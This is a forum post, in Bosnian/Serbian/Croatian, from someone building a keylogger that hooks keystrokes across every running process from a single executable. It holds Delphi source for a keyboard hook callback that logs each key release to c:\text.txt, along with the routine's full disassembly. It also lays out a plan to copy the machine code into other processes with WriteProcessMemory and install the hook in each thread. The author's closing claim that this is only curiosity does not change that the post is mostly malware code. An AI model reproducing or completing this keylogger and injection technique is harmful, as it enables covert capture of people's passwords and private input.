Danas cu da napravim pa cu tu pasteat kod.. pokusavam napravit keylogger za sve threadove koji rade u sistemu, a da taj keylogger ima samo jedan .exe, znaci ne i dll.. zato moram strpat u svaki proces KeyboardProc i onda za svaki proces pozvat SetWindowsHookEx.. mada cuo sam da on dosta trosi performanse sistema, uglavnom ovo je plan, KeyboardProc izgleda ovako:
Code:
{ WH_KEYBOARD hook callback: on every key-up event with nCode = HC_ACTION it
  appends the low byte of wParam to c:\text.txt, then forwards the event
  with CallNextHookEx. Declared as a procedure, so it returns nothing
  explicitly; the result of CallNextHookEx is discarded. }
Procedure _KeyboardProc(nCode: Integer; wParam: WPARAM;
lParam: LPARAM); stdcall;
var
LogFile : THandle;      // handle returned by CreateFile (never validated here)
BytesWritten : DWORD;   // out-parameter filled by WriteFile
Ch : Byte;              // LF (10) written after a CR (13) to break lines
begin
// KF_UP lives in the high word of lParam; only key releases are logged,
// and only when the hook code is HC_ACTION.
if ((HiWord(lParam) and KF_UP) <> 0) and
(nCode = HC_ACTION) then
begin
// Open (or create) the log file and seek to its end so each write appends.
LogFile := CreateFile('c:\text.txt', GENERIC_WRITE,
FILE_SHARE_READ, Nil,
OPEN_ALWAYS, 0, 0);
SetFilePointer(LogFile, 0, Nil, FILE_END);
// One byte of wParam is written as-is (a raw key code, not a translated character).
WriteFile (LogFile, wParam, 1, BytesWritten, Nil);
if Lo(wParam) = 13 then
begin
Ch := 10;
WriteFile (LogFile, Ch, 1, BytesWritten, Nil);
end;
CloseHandle(LogFile);
end;
// Pass the event down the hook chain; hHook is given as 0.
CallNextHookEx(0, nCode, wParam, lParam);
end;
Disasemblirana procedura izgleda ovako:
Code:
00451FDC /$ 55 PUSH EBP
00451FDD |. 8BEC MOV EBP,ESP
00451FDF |. 83C4 F8 ADD ESP,-8
00451FE2 |. 53 PUSH EBX
00451FE3 |. 56 PUSH ESI
00451FE4 |. 57 PUSH EDI
00451FE5 |. 8B5D 10 MOV EBX,DWORD PTR SS:[EBP+10]
00451FE8 |. 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]
00451FEB |. 8BC3 MOV EAX,EBX
00451FED |. C1E8 10 SHR EAX,10
00451FF0 |. F6C4 80 TEST AH,80
00451FF3 |. 74 67 JE SHORT Project1.0045205C
00451FF5 |. 85F6 TEST ESI,ESI
00451FF7 |. 75 63 JNZ SHORT Project1.0045205C
00451FF9 |. 6A 00 PUSH 0 ; /hTemplateFile = NULL
00451FFB |. 6A 00 PUSH 0 ; |Attributes = 0
00451FFD |. 6A 04 PUSH 4 ; |Mode = OPEN_ALWAYS
00451FFF |. 6A 00 PUSH 0 ; |pSecurity = NULL
00452001 |. 6A 01 PUSH 1 ; |ShareMode = FILE_SHARE_READ
00452003 |. 68 00000040 PUSH 40000000 ; |Access = GENERIC_WRITE
00452008 |. 68 74204500 PUSH Project1.00452074 ; |FileName = "c:\text.txt"
0045200D |. E8 963EFBFF CALL <JMP.&kernel32.CreateFileA> ; \CreateFileA
00452012 |. 8BF8 MOV EDI,EAX
00452014 |. 6A 02 PUSH 2 ; /Origin = FILE_END
00452016 |. 6A 00 PUSH 0 ; |pOffsetHi = NULL
00452018 |. 6A 00 PUSH 0 ; |OffsetLo = 0
0045201A |. 57 PUSH EDI ; |hFile
0045201B |. E8 0040FBFF CALL <JMP.&kernel32.SetFilePointer> ; \SetFilePointer
00452020 |. 6A 00 PUSH 0 ; /pOverlapped = NULL
00452022 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] ; |
00452025 |. 50 PUSH EAX ; |pBytesWritten
00452026 |. 6A 01 PUSH 1 ; |nBytesToWrite = 1
00452028 |. 8D45 0C LEA EAX,DWORD PTR SS:[EBP+C] ; |
0045202B |. 50 PUSH EAX ; |Buffer
0045202C |. 57 PUSH EDI ; |hFile
0045202D |. E8 1E40FBFF CALL <JMP.&kernel32.WriteFile> ; \WriteFile
00452032 |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]
00452035 |. 25 FF000000 AND EAX,0FF
0045203A |. 66:83F8 0D CMP AX,0D
0045203E |. 75 16 JNZ SHORT Project1.00452056
00452040 |. C645 FB 0A MOV BYTE PTR SS:[EBP-5],0A
00452044 |. 6A 00 PUSH 0 ; /pOverlapped = NULL
00452046 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] ; |
00452049 |. 50 PUSH EAX ; |pBytesWritten
0045204A |. 6A 01 PUSH 1 ; |nBytesToWrite = 1
0045204C |. 8D45 FB LEA EAX,DWORD PTR SS:[EBP-5] ; |
0045204F |. 50 PUSH EAX ; |Buffer
00452050 |. 57 PUSH EDI ; |hFile
00452051 |. E8 FA3FFBFF CALL <JMP.&kernel32.WriteFile> ; \WriteFile
00452056 |> 57 PUSH EDI ; /hObject
00452057 |. E8 343EFBFF CALL <JMP.&kernel32.CloseHandle> ; \CloseHandle
0045205C |> 53 PUSH EBX ; /lParam
0045205D |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C] ; |
00452060 |. 50 PUSH EAX ; |wParam
00452061 |. 56 PUSH ESI ; |HookCode
00452062 |. 6A 00 PUSH 0 ; |hHook = NULL
00452064 |. E8 DF41FBFF CALL <JMP.&user32.CallNextHookEx> ; \CallNextHookEx
00452069 |. 5F POP EDI
0045206A |. 5E POP ESI
0045206B |. 5B POP EBX
0045206C |. 59 POP ECX
0045206D |. 59 POP ECX
0045206E |. 5D POP EBP
0045206F \. C2 0C00 RETN 0C
Sad moram da povadim masinski kod te procedure (to su oni bajtovi $55, $8B, $EC...) te onda u svaki proces da nadjem slobodno mjesto u memoriji i da onda sav taj masinski kod upisem u taj proces sa WriteProcessMemory!! To je lako samo je problem sto svakom procesu stack izgleda drukcije, tako da cu prvo morat stack da izmjenim!!
To ce rezultirat da svaki thread koji radi ima u sebi ugradjen _KeyboardProc i onda samo ostaje za svaki proces pozvat SetWindowsHookEx(WH_KEYBOARD,@adresa_keyboard_proca,0,pi.dwThreadId);
I to je to.. prvo moram da stack sredim da bude "isti" kod svih, tj. da prije poziva ovakvih komandi:
MOV EBX,DWORD PTR SS:[EBP+10], postavim na EBP+10 ono sto treba da bude..
poz
ps:
sa GetAsyncKeyState mogu da hvatam samo tastere, sa SetWindowsHookEx mogu i tastere i misa i 1000 drugih stvari :)
Nece to bit keylogger vec me to neki dan s cimalo pa me sad zanima dal cu uspjet to da uradim (iz jednog .exe-a)